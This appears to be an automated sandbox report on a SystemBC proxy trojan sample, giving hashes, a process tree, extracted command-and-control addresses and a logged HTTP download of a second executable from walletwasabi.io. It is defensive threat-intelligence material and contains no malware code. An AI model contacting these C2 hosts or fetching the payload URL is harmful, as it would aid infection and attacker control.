Overview

overview

10

Static

static

5350c1492b...4f.exe

windows7_x64

10

5350c1492b...4f.exe

windows10_x64

10

Analysis

  • max time kernel
    138s
  • max time network
    114s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    03/06/2021, 09:51 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5350c1492b2359b71a31ba103cc19b4f.exe

  • Size

    886KB

  • MD5

    5350c1492b2359b71a31ba103cc19b4f

  • SHA1

    67b81cec1269523057aac6db028b33955bffc735

  • SHA256

    e90fa8b16a3e943baf7882ce978b4903c3012be94370e99eb0560bb8e970d682

  • SHA512

    6d0c70987524b698bf7e8cb78cfa247078810938535ff569dd9691ed6d5e8fbea703bf62180e07e624fda13c732db226d3f2231c48e3c698e5338cfb5f253f80

Score
10/10
systembctrojan

Malware Config

Extracted

Family

systembc

C2

88.198.147.80:4174

78.47.64.46:4174

Signatures

  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Drops file in Windows directory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5350c1492b2359b71a31ba103cc19b4f.exe
    "C:\Users\Admin\AppData\Local\Temp\5350c1492b2359b71a31ba103cc19b4f.exe"
    1⤵
    • Drops file in Windows directory
    PID:1040
  • C:\Users\Admin\AppData\Local\Temp\5350c1492b2359b71a31ba103cc19b4f.exe
    C:\Users\Admin\AppData\Local\Temp\5350c1492b2359b71a31ba103cc19b4f.exe start
    1⤵
    • Drops file in Windows directory
    PID:700
  • C:\Windows\TEMP\vfjn.exe
    C:\Windows\TEMP\vfjn.exe
    1⤵
    • Executes dropped EXE
    • Drops file in Windows directory
    PID:2116
  • C:\Windows\TEMP\vfjn.exe
    C:\Windows\TEMP\vfjn.exe start
    1⤵
    • Executes dropped EXE
    PID:3168

Network

  • flag-unknown
    DNS
    walletwasabi.io
    5350c1492b2359b71a31ba103cc19b4f.exe
    Remote address:
    8.8.8.8:53
    Request
    walletwasabi.io
    IN A
    Response
    walletwasabi.io
    IN A
    91.214.124.161
  • flag-unknown
    GET
    http://walletwasabi.io/1.exe
    5350c1492b2359b71a31ba103cc19b4f.exe
    Remote address:
    91.214.124.161:80
    Request
    GET /1.exe HTTP/1.0
    Host: walletwasabi.io
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    Connection: close
    Response
    HTTP/1.1 200 OK
    Date: Thu, 03 Jun 2021 09:51:31 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
    Last-Modified: Thu, 03 Jun 2021 09:03:25 GMT
    ETag: "dd800-5c3d8d906b140"
    Accept-Ranges: bytes
    Content-Length: 907264
    Connection: close
    Content-Type: application/octet-stream
  • 88.198.147.80:4174
    5350c1492b2359b71a31ba103cc19b4f.exe
    377 B
     208 B
     6
    4
  • 91.214.124.161:80
    http://walletwasabi.io/1.exe
    http
    5350c1492b2359b71a31ba103cc19b4f.exe
    18.0kB
     932.6kB
     373
    625

    HTTP Request

    GET http://walletwasabi.io/1.exe

    HTTP Response

    200
  • 8.8.8.8:53
    walletwasabi.io
    dns
    5350c1492b2359b71a31ba103cc19b4f.exe
    61 B
     77 B
     1
    1

    DNS Request

    walletwasabi.io

    DNS Response

    91.214.124.161

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/700-117-0x00000000001D0000-0x00000000001F3000-memory.dmp

    Filesize

    140KB

    Download

  • memory/700-119-0x0000000000400000-0x00000000004E2000-memory.dmp

    Filesize

    904KB

    Download

  • memory/1040-114-0x0000000000560000-0x000000000060E000-memory.dmp

    Filesize

    696KB

    Download

  • memory/1040-116-0x0000000000400000-0x00000000004E2000-memory.dmp

    Filesize

    904KB

    Download

  • memory/1040-115-0x0000000002280000-0x0000000002285000-memory.dmp

    Filesize

    20KB

    Download

  • memory/2116-123-0x00000000001D0000-0x00000000001F3000-memory.dmp

    Filesize

    140KB

    Download

  • memory/2116-125-0x0000000000400000-0x00000000004E2000-memory.dmp

    Filesize

    904KB

    Download

  • memory/3168-128-0x0000000000590000-0x000000000063E000-memory.dmp

    Filesize

    696KB

    Download

  • memory/3168-129-0x0000000000400000-0x00000000004E2000-memory.dmp

    Filesize

    904KB

    Download

  • memory/3168-127-0x00000000001E0000-0x00000000001E1000-memory.dmp

    Filesize

    4KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.